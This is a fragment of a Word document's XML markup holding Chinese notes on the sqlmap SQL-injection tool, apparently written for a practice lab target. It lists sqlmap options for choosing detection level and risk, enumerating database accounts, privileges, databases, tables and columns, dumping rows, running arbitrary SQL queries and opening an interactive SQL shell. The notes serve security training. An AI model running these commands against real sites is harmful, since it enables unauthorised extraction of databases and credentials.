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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>sqlmap --update 更新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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-u "http://inject2.</w:t>
      </w:r>
      <w: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u w:val="non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u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://so.csdn.net/so/search?q=lab&amp;spm=1001.2101.3001.7020" \t "https://blog.csdn.net/phpppppppppp/article/details/_blank"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u w:val="none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u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w: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u w:val="none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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.aqlab.cn:81/Pass-01/index.php?id=1" # 指定URL，get请求方式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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>-r request.txt # Post提交方式，使用HTTP请求文件，该文件可从BurpSuit中导出。 （BurpSuit抓包--&gt;将请求复制到txt中即可）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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill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t>--level</w:t>
      </w:r>
      <w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>=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t>    2：检测cookie中是否含有注入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t>    3：检测user-agent、referer是否含有注入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295"/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t>5：检测host是否含有注入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295"/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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>--risk 默认1，最高4，等级高容易造成数据被篡改风险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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>--threads=7 #提高并发线程，默认为1，建议不要超过10，否则影响站点可用性，与--predict-out 不兼容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  <w:t>--users # 查询所有的数据库账号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  <w:t>--dbs # 查询所有数据库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  <w:t xml:space="preserve"> --schema # 查询源数据库（包含定义数据的数据）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  <w:t xml:space="preserve"> -a # 查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等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  <w:t>-D dvwa# 指定数据库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  <w:t>--current-user # 查询当前数据库用户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  <w:t>--current-db # 查询当前数据库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  <w:t xml:space="preserve"> --hostname # 查看服务器的主机名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  <w:t xml:space="preserve"> --Privileges -U username # 查询username的权限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  <w:t>--roles 角色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  <w:t xml:space="preserve"> --tables # 查看所有的表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  <w:t xml:space="preserve"> -T # 指定表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  <w:t xml:space="preserve"> --columns # 查看所有的字段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  <w:t xml:space="preserve"> -C # 指定字段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  <w:t xml:space="preserve"> --count # 计数，查看有多少条数据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  <w:t xml:space="preserve"> --exclude-sysdbs # 排除系统库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  <w:t xml:space="preserve"> --dump # 查看数据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  <w:t xml:space="preserve"> --start 3 # 查看第三条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  <w:t>--end 4 # 查看第四条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  <w:t xml:space="preserve"> --sql-query "select * from users" # 执行语句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  <w:t>--common-columns # 暴力破解字段，应用于两种情况：①无权限读取数据。②mysql&lt;5.0 ，没有 infomation_schema库 22. --common-tables # 暴力破解表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  <w:t>--common-tables # 暴力破解表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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>--batch # 自动选是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 w:themeColor="background1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:highlight w:val="black"/>
          <w:shd w:val="clear" w:fill="EEF0F4"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="bg1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>--sql-shell # 进入交互式mysql窗口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0NTY0MDYzMGY3NmRkZDNjOTk3ZDAxYjI3MDRhYzEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="090758AD"/>
    <w:rsid w:val="3456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429</Words>
  <Characters>853</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>947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2022-12-26T10:55:00Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>羽小洛</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-28T06:33:11Z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54D4C94920824DCFB77BBD14BE831E05</vt:lpwstr>
  </property>
</Properties>
</file>